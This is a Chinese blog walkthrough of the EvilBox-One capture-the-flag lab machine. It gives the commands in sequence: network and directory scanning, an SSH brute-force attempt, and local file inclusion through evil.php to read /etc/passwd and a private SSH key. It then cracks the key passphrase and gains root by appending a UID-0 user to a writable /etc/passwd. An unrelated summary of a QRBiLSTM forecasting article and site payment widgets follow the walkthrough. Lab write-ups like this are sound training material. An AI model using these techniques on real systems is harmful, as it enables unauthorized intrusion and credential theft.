EvilBox---One靶机过程

EvilBox—One

  1. 扫IPnetdiscover -i eth0 -r 192.168.70.0/24
    在这里插入图片描述

  2. 详细扫nmap -A 192.168.70.150
    在这里插入图片描述

  3. 访问IP
    在这里插入图片描述

  4. 扫描路径dirb http://192.168.70.150
    在这里插入图片描述

  5. 访问一遍
    在这里插入图片描述

  6. 尝试爆破hydra -l H4x0r -P top1000.txt ssh://192.168.70.150,失败

  7. 查看更深路径dirb http://192.168.70.150/secret/,是空
    在这里插入图片描述

  8. 利用gobuster再试一下gobuster dir -w directory-list-1.0.txt -x html -u http://192.168.70.150/secret/ -x txt,php,jsp
    在这里插入图片描述

  9. 运用模糊测试看是否有路径wfuzz -c -w /usr/share/wordlists/wfuzz/general/megabeast.txt -u http://192.168.70.150/secret/evil.php?FUZZ=/etc/passwd --hh 0
    在这里插入图片描述

  10. 访问http://192.168.70.150/secret/evil.php?command=/etc/passwd
    在这里插入图片描述

  11. 因为扫描到ssh服务,所以看用户有没有id_rsahttp://192.168.70.150/secret/evil.php?command=/home/mowree/.ssh/id_rsa
    在这里插入图片描述

  12. 拿到authorized_keys,http://192.168.70.150/secret/evil.php?command=/home/mowree/.ssh/authorized_keys,改域名为ip

  13. 将id_rsa和authorized_keys放到/root/.ssh目录下
    在这里插入图片描述

      authorized_keys
    
      我们需要本地机器ssh访问远程服务器时为了减少输入密码的步骤,基本上都会在本地机器生成ssh公钥,然后将本地ssh公钥复制到远程服务器的.ssh/authorized_keys中,这样就可以免密登录了。( 服务器之间访问同理)。
    
  14. 提取密钥ssh2john id_rsa > PK.txt

  15. john解密john PK.txt,拿到密码unicorn
    在这里插入图片描述

  16. 登录ssh mowree@192.168.70.150

  17. 拿flag156Rbp0soobpzWSVzKh9YOvzGLgtPZQ
    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传在这里插入图片描述

  18. 使用hash-identifier查看加密类型=>无

  19. 查看内核版本uname -a/cat /proc/version

    Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
    
  20. 查看系统版本cat /etc/issue
    在这里插入图片描述

  21. find / -perm -4000 2>/dev/null
    在这里插入图片描述

  22. find / -perm -2000 2>/dev/null
    在这里插入图片描述

  23. searchsploit linux 4.19没什么漏洞

  24. 查找拥有写权限的文件find / -writable 2>/dev/null | grep -v proc
    在这里插入图片描述

  25. 创建密码openssl passwd -1 123456,-l代表md5加密
    $1$YyfR0cZr$u2sqIsJObwKadVj8z69UK1

  26. 添加新用户echo 'test:$1$YyfR0cZr$u2sqIsJObwKadVj8z69UK1:0:0::/root:/bin/bash' >>/etc/passwd

  27. 切换用户su test

  28. 到根目录下拿flag2

主要内容:本文详细介绍了一种QRBiLSTM(分位数回归双向长短期记忆网络)的时间序列区间预测方法。首先介绍了项目背景以及模型的优势,比如能够有效利用双向的信息,并对未来的趋势上限和下限做出估计。接着从数据生成出发讲述了具体的代码操作过程:数据预处理,搭建模型,进行训练,并最终可视化预测结果与计算分位数回归的边界线。提供的示例代码可以完全运行并且包含了数据生成环节,便于新手快速上手,深入学习。此外还指出了模型未来发展的方向,例如加入额外的输入特性和改善超参数配置等途径提高模型的表现。文中强调了时间序列的标准化和平稳检验,在样本划分阶段需要按时间序列顺序进行划分,并在训练阶段采取合适的手段预防过度拟合发生。 适合人群:对于希望学习和应用双向长短时记忆网络解决时序数据预测的初学者和具有一定基础的研究人员。尤其适用于有金融数据分析需求、需要做多一步或多步预测任务的从业者。 使用场景及目标:应用于金融市场波动预报、天气状况变化预测或是物流管理等多个领域内的决策支持。主要目的在于不仅能够提供精确的数值预计还能描绘出相应的区间概率图以增强结论置信程度。 补充说明:本教程通过一个由正弦信号加白噪构造而成的简单实例来指导大家理解和执行QRBiLSTM流程的所有关键步骤,这既方便于初学者跟踪学习,又有利于专业人士作为现有系统的补充参考工具。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值